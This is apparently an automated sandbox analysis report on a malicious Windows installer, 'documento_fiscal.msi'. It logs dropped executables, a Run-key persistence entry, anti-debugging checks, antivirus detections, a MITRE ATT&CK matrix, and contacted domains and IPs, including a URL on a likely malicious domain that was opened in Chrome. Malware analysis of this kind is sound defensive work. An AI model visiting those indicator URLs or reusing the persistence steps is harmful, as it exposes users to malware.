Source: C:\Windows\Installer\MSI894F.tmp	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\Installer\MSI894F.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Installer\MSI894F.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Installer\MSI894F.tmp	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Installer\MSI894F.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Installer\MSI894F.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior

Source: C:\Windows\Installer\MSI892F.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: documento_fiscal.msi

Static file information: File size 24161280 > 1048576

Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdbC source: MSI892F.tmp, 00000003.00000000.1707896789.00000000001DD000.00000002.00000001.01000000.00000003.sdmp, MSI892F.tmp, 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmp, MSI894F.tmp, 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmp, MSI894F.tmp, 00000004.00000000.1708556562.0000000000D8D000.00000002.00000001.01000000.00000005.sdmp, documento_fiscal.msi, MSI7F79.tmp.1.dr, 58791b.msi.1.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: documento_fiscal.msi, MSI7CF8.tmp.1.dr, MSI7C88.tmp.1.dr, MSI7BCB.tmp.1.dr, MSI7CA9.tmp.1.dr, 58791b.msi.1.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdb source: MSI892F.tmp, 00000003.00000000.1707896789.00000000001DD000.00000002.00000001.01000000.00000003.sdmp, MSI892F.tmp, 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmp, MSI894F.tmp, 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmp, MSI894F.tmp, 00000004.00000000.1708556562.0000000000D8D000.00000002.00000001.01000000.00000005.sdmp, documento_fiscal.msi, MSI7F79.tmp.1.dr, 58791b.msi.1.dr

Source: initial sample

Static PE information: section where entry point is pointing to: .yK!

Source: AGLoader.dll.1.dr	Static PE information: section name: .didata
Source: AGLoader.dll.1.dr	Static PE information: section name: .L<L
Source: AGLoader.dll.1.dr	Static PE information: section name: .JIY
Source: AGLoader.dll.1.dr	Static PE information: section name: .yK!

Source: C:\Windows\Installer\MSI892F.tmp	Code function: 3_2_001B81F0 push ecx; ret		3_2_001B8203
Source: C:\Windows\Installer\MSI894F.tmp	Code function: 4_2_00D681F0 push ecx; ret		4_2_00D68203

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\System32\msiexec.exe	Executable created and started: C:\Windows\Installer\MSI894F.tmp			Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Executable created and started: C:\Windows\Installer\MSI892F.tmp			Jump to behavior

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI894F.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI7BCB.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI7C59.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI7CF8.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI892F.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Defendr\AGLoader.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Defendr\LKdayanJELT9QDD900055.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI7CA9.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI7C88.tmp	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI894F.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI7BCB.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI7C59.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI7CF8.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI892F.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI7CA9.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI7C88.tmp	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	Registry value created or modified: HKEY_CURRENT_USER\Microsoft\Windows\CurrentVersion\Run PlacaVideo			Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Registry value created or modified: HKEY_CURRENT_USER\Microsoft\Windows\CurrentVersion\Run PlacaVideo			Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI7BCB.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI7C59.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI7CF8.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Defendr\AGLoader.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Defendr\LKdayanJELT9QDD900055.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI7CA9.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI7C88.tmp	Jump to dropped file

Source: C:\Windows\Installer\MSI894F.tmp	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_4-35305
Source: C:\Windows\Installer\MSI892F.tmp	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_3-34905

Source: C:\Windows\Installer\MSI892F.tmp

API coverage: 4.4 %

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Windows\Installer\MSI892F.tmp	Code function: 3_2_001D069D FindFirstFileExW,FindNextFileW,FindClose,FindClose,		3_2_001D069D
Source: C:\Windows\Installer\MSI894F.tmp	Code function: 4_2_00D8069D FindFirstFileExW,FindNextFileW,FindClose,FindClose,		4_2_00D8069D

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Installer\MSI892F.tmp

Code function: 3_2_001B83BD IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_001B83BD

Source: C:\Windows\Installer\MSI892F.tmp	Code function: 3_2_001D03E8 mov eax, dword ptr fs:[00000030h]	3_2_001D03E8
Source: C:\Windows\Installer\MSI892F.tmp	Code function: 3_2_001C843F mov ecx, dword ptr fs:[00000030h]	3_2_001C843F
Source: C:\Windows\Installer\MSI894F.tmp	Code function: 4_2_00D803E8 mov eax, dword ptr fs:[00000030h]	4_2_00D803E8
Source: C:\Windows\Installer\MSI894F.tmp	Code function: 4_2_00D7843F mov ecx, dword ptr fs:[00000030h]	4_2_00D7843F

Source: C:\Windows\Installer\MSI892F.tmp

Code function: 3_2_00192510 GetProcessHeap,

3_2_00192510

Source: C:\Windows\System32\msiexec.exe

Process created: C:\Windows\Installer\MSI892F.tmp "C:\Windows\Installer\MSI892F.tmp" /DontWait "C:\Users\user\Documents\microsoft.cmd" C:\Users\user\Documents\

Jump to behavior

Source: C:\Windows\Installer\MSI892F.tmp	Code function: 3_2_001B83BD IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_001B83BD
Source: C:\Windows\Installer\MSI892F.tmp	Code function: 3_2_001BC3B6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_001BC3B6
Source: C:\Windows\Installer\MSI892F.tmp	Code function: 3_2_001B8553 SetUnhandledExceptionFilter,	3_2_001B8553
Source: C:\Windows\Installer\MSI892F.tmp	Code function: 3_2_001B7B9C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_001B7B9C
Source: C:\Windows\Installer\MSI894F.tmp	Code function: 4_2_00D6C3B6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00D6C3B6
Source: C:\Windows\Installer\MSI894F.tmp	Code function: 4_2_00D683BD IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00D683BD
Source: C:\Windows\Installer\MSI894F.tmp	Code function: 4_2_00D68553 SetUnhandledExceptionFilter,	4_2_00D68553
Source: C:\Windows\Installer\MSI894F.tmp	Code function: 4_2_00D67B9C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00D67B9C

Source: C:\Windows\Installer\MSI892F.tmp

Code function: 3_2_00197660 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,Sleep,EnumWindows,BringWindowToTop,WaitForSingleObject,GetExitCodeProcess,GetWindowThreadProcessId,GetWindowLongW,

3_2_00197660

Source: C:\Windows\System32\cmd.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://senhordos-infects.digital/clientesnew/inspecionando.php

Jump to behavior

Source: C:\Windows\Installer\MSI892F.tmp

Code function: 3_2_001B801C cpuid

3_2_001B801C

Source: C:\Windows\Installer\MSI892F.tmp	Code function: GetLocaleInfoEx,FormatMessageA,	3_2_001A2161
Source: C:\Windows\Installer\MSI892F.tmp	Code function: GetLocaleInfoEx,	3_2_001B71C1
Source: C:\Windows\Installer\MSI892F.tmp	Code function: EnumSystemLocalesW,	3_2_001D36B6
Source: C:\Windows\Installer\MSI892F.tmp	Code function: EnumSystemLocalesW,	3_2_001D3701
Source: C:\Windows\Installer\MSI892F.tmp	Code function: EnumSystemLocalesW,	3_2_001D379C
Source: C:\Windows\Installer\MSI892F.tmp	Code function: EnumSystemLocalesW,	3_2_001CC7A2
Source: C:\Windows\Installer\MSI892F.tmp	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	3_2_001D3827
Source: C:\Windows\Installer\MSI892F.tmp	Code function: GetLocaleInfoW,	3_2_001D3A7A
Source: C:\Windows\Installer\MSI892F.tmp	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_001D3BA3
Source: C:\Windows\Installer\MSI892F.tmp	Code function: GetLocaleInfoW,	3_2_001D3CA9
Source: C:\Windows\Installer\MSI892F.tmp	Code function: GetLocaleInfoW,	3_2_001CCD1F
Source: C:\Windows\Installer\MSI892F.tmp	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	3_2_001D3D78
Source: C:\Windows\Installer\MSI894F.tmp	Code function: GetLocaleInfoEx,	4_2_00D671C1
Source: C:\Windows\Installer\MSI894F.tmp	Code function: GetLocaleInfoEx,FormatMessageA,	4_2_00D52161
Source: C:\Windows\Installer\MSI894F.tmp	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	4_2_00D83414
Source: C:\Windows\Installer\MSI894F.tmp	Code function: EnumSystemLocalesW,	4_2_00D836B6
Source: C:\Windows\Installer\MSI894F.tmp	Code function: EnumSystemLocalesW,	4_2_00D8379C
Source: C:\Windows\Installer\MSI894F.tmp	Code function: EnumSystemLocalesW,	4_2_00D7C7A2
Source: C:\Windows\Installer\MSI894F.tmp	Code function: EnumSystemLocalesW,	4_2_00D83701
Source: C:\Windows\Installer\MSI894F.tmp	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	4_2_00D83827
Source: C:\Windows\Installer\MSI894F.tmp	Code function: GetLocaleInfoW,	4_2_00D83A7A
Source: C:\Windows\Installer\MSI894F.tmp	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	4_2_00D83BA3
Source: C:\Windows\Installer\MSI894F.tmp	Code function: GetLocaleInfoW,	4_2_00D83CA9
Source: C:\Windows\Installer\MSI894F.tmp	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	4_2_00D83D78
Source: C:\Windows\Installer\MSI894F.tmp	Code function: GetLocaleInfoW,	4_2_00D7CD1F

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Windows\Installer\MSI892F.tmp

Code function: 3_2_001B8615 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

3_2_001B8615

Source: C:\Windows\Installer\MSI892F.tmp

Code function: 3_2_001CD192 GetTimeZoneInformation,

3_2_001CD192

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Replication Through Removable Media	1 Native API	1 Registry Run Keys / Startup Folder	1 Exploitation for Privilege Escalation	121 Masquerading	OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	11 Process Injection	1 Disable or Modify Tools	LSASS Memory	12 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	11 Process Injection	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	NTDS	11 Peripheral Device Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	33 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
documento_fiscal.msi	42%	ReversingLabs	Win32.Adware.NotToTrack
documento_fiscal.msi	50%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Defendr\LKdayanJELT9QDD900055.exe	100%	Avira	ADWARE/NotToTrack.dzcps
C:\Users\user\AppData\Roaming\Defendr\AGLoader.dll	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Defendr\AGLoader.dll	50%	ReversingLabs	Win32.Trojan.Barys
C:\Users\user\AppData\Roaming\Defendr\AGLoader.dll	51%	Virustotal		Browse
C:\Users\user\AppData\Roaming\Defendr\LKdayanJELT9QDD900055.exe	62%	ReversingLabs	Win32.Adware.NotToTrack
C:\Users\user\AppData\Roaming\Defendr\LKdayanJELT9QDD900055.exe	61%	Virustotal		Browse
C:\Windows\Installer\MSI7BCB.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI7BCB.tmp	1%	Virustotal		Browse
C:\Windows\Installer\MSI7C59.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI7C59.tmp	1%	Virustotal		Browse
C:\Windows\Installer\MSI7C88.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI7C88.tmp	1%	Virustotal		Browse
C:\Windows\Installer\MSI7CA9.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI7CA9.tmp	1%	Virustotal		Browse
C:\Windows\Installer\MSI7CF8.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI7CF8.tmp	1%	Virustotal		Browse
C:\Windows\Installer\MSI892F.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI892F.tmp	0%	Virustotal		Browse
C:\Windows\Installer\MSI894F.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI894F.tmp	0%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
http://senhordos-infects.digital/favicon.ico	0%	Avira URL Cloud	safe
http://senhordos-infects.digital/favicon.ico	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
senhordos-infects.digital	45.178.182.88	true	false		unknown
www.google.com	216.58.206.68	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://senhordos-infects.digital/favicon.ico	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://senhordos-infects.digital/clientesnew/inspecionando.php	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
239.255.255.250	unknown	Reserved	unknown	unknown	false
45.178.182.88	senhordos-infects.digital	Brazil	269098	AbsamHostInternetDataCenterBR	false
216.58.206.68	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.4

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1487498
Start date and time:	2024-08-04 13:58:10 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	documento_fiscal.msi
Detection:	MAL
Classification:	mal80.evad.winMSI@27/144@4/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 25 Number of non-executed functions: 266
Cookbook Comments:	Found application associated with file extension: .msi

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.186.67, 142.250.186.78, 142.251.168.84, 34.104.35.123, 199.232.210.172, 192.229.221.95, 172.217.18.3, 172.217.18.14
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, clients2.google.com, ocsp.digicert.com, accounts.google.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, update.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtSetInformationFile calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
239.255.255.250	f2.exe	Get hash	malicious	BlackMoon	Browse
	SecuriteInfo.com.Program.Unwanted.5011.11652.31740.exe	Get hash	malicious	PureLog Stealer	Browse
	2.exe	Get hash	malicious	Phisher	Browse
	SecuriteInfo.com.Program.Unwanted.5011.11652.31740.exe	Get hash	malicious	PureLog Stealer	Browse
	jp95FFMUoh.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse
	https://dvmtp.r.ag.d.sendibm3.com/mk/un/sh/1t6AVsdYhqSR1o1yYHZUELgBUnazHr/j54QtPSXoIeR	Get hash	malicious	Unknown	Browse
	https://transportationzhxztpro.top/i/	Get hash	malicious	Unknown	Browse
	https://freeusps.com/collections/2018/products/love-flourishes-2018-4946?data_from=collection_detail	Get hash	malicious	Unknown	Browse
	https://loker-pt-freeport-indonesia-2024.digitall-co.web.id/	Get hash	malicious	Unknown	Browse
	https://mail.valeshia.50-6-170-168.cprapid.com/	Get hash	malicious	Unknown	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AbsamHostInternetDataCenterBR	Pedido-Faturado-398731.msi	Get hash	malicious	Unknown	Browse	45.178.181.171
AbsamHostInternetDataCenterBR	Pedido-Faturado-398731.msi	Get hash	malicious	Unknown	Browse	45.178.181.171

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	f2.exe	Get hash	malicious	BlackMoon	Browse	184.28.90.27 20.114.59.183
	2.exe	Get hash	malicious	Phisher	Browse	184.28.90.27 20.114.59.183
	SecuriteInfo.com.Program.Unwanted.5011.11652.31740.exe	Get hash	malicious	PureLog Stealer	Browse	184.28.90.27 20.114.59.183
	jp95FFMUoh.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	184.28.90.27 20.114.59.183
	https://dvmtp.r.ag.d.sendibm3.com/mk/un/sh/1t6AVsdYhqSR1o1yYHZUELgBUnazHr/j54QtPSXoIeR	Get hash	malicious	Unknown	Browse	184.28.90.27 20.114.59.183
	https://transportationzhxztpro.top/i/	Get hash	malicious	Unknown	Browse	184.28.90.27 20.114.59.183
	https://freeusps.com/collections/2018/products/love-flourishes-2018-4946?data_from=collection_detail	Get hash	malicious	Unknown	Browse	184.28.90.27 20.114.59.183
	https://loker-pt-freeport-indonesia-2024.digitall-co.web.id/	Get hash	malicious	Unknown	Browse	184.28.90.27 20.114.59.183
	https://mail.valeshia.50-6-170-168.cprapid.com/	Get hash	malicious	Unknown	Browse	184.28.90.27 20.114.59.183
	https://freeusps.com/collections/all-usps-stamp/products/u-s-flag-2022-9683?data_from=collection_detail	Get hash	malicious	Unknown	Browse	184.28.90.27 20.114.59.183

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Roaming\Defendr\LKdayanJELT9QDD900055.exe	HomeDesk.msi	Get hash	malicious	Unknown	Browse
